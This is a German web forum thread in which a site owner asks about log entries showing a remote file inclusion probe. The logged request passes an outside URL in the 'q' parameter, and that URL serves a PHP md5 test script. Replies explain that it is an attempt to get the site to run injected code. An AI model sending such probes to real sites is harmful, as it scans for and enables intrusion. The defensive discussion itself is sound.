| morevideo |
Geschrieben am: Mo 4.02.2008, 18:52
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 55 Mitglied seit: 25.02.2007 |
Hallo,
ich entdecke in den Logfiles des öfteren Einträge wie diesen hier: GET /index.html?q=http://www.felixtorresycia.com/admin/correo/enaq/ecib/ Wenn man die fremde URL aufruft, findet man ein kurzes PHP Script in Klarschrift: <?php echo md5("just_a_test");?> Muss ich mir da Sorgen machen? Und wenn ja, was mach ich da gegen? Schönen Dank vorab. |
![]() |
| nitrit |
#2 Geschrieben am: Mo 4.02.2008, 18:55 (+00:03)
|
|
AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 259 Mitglied seit: 8.08.2007 |
da probiert jemand über q ein php-script zu übergeben, dass dein script dann hoffentlich ausführt....
was du dagegen machst? nichts, wenn du dir sicher bist, dass dein script keine solchen lücken hat -------------------- |
![]() |
| jeronimo |
#3 Geschrieben am: Mo 4.02.2008, 19:06 (+00:11)
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 105 Mitglied seit: 19.12.2007 |
|
![]() |
| morevideo |
#4 Geschrieben am: Mo 4.02.2008, 19:16 (+00:09)
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 55 Mitglied seit: 25.02.2007 |
jeronimo: Vielen Dank, die GET Methode ist mir schon bekannt,
es ging mir vielmehr um das Unterschieben eines php scriptes und die Deutung desselben als Sicherheitslücke und Vorbote eines wie auch immer gearteten Angriffs. nitrit: Danke, ich werd das unter Beobachtung halten. |
![]() |
| jeronimo |
#5 Geschrieben am: Mo 4.02.2008, 20:11 (+00:55)
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 105 Mitglied seit: 19.12.2007 |
scheint eine test datei die bei md5 bei einer Verbindung verwendet und abgelegt wird - wie die datei heißt ist vermutlich konfigurationsabhängig . . .
MD5 |
![]() |
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/22833
![]() |
![]() ![]() ![]() |
| Themen Titel | Autor | Views | Antworten | Letzte Aktion |
| Windows Movie Maker für .3gp files | fox | 452 | 1 | So 22.06.2008, 23:06 |
| Kostenlose PSD Files | Platus | 225 | 2 | Fr 14.03.2008, 14:00 |
| 6 Webdesign - PSD Files Gratis | Platus | 256 | 2 | Mi 20.02.2008, 18:17 |
| [Suche] Youtubeportal für MP3 Files | woody | 150 | 2 | Fr 28.12.2007, 14:27 |
| Komische Zeichen in Files | spaceman007 | 214 | 2 | Do 12.07.2007, 16:07 |
| Probleme mit Zanox CSV Files | Stefu | 778 | 9 | Fr 3.11.2006, 16:18 |
| Verzeichnis 'files' / 'atd'? | Suppi | 310 | 1 | Mi 12.04.2006, 21:36 |
| Alle Files in einem Verzeichnis includen | radarin | 476 | 10 | Mo 27.02.2006, 00:57 |
| Liest Google CSS Files? | Alain Aubert | 1816 | 3 | So 13.11.2005, 11:42 |
| Erstellen von PDF Files... | milkboy | 2002 | 6 | Di 4.10.2005, 14:31 |
Anzeige - [Hier werben / Mediadaten]











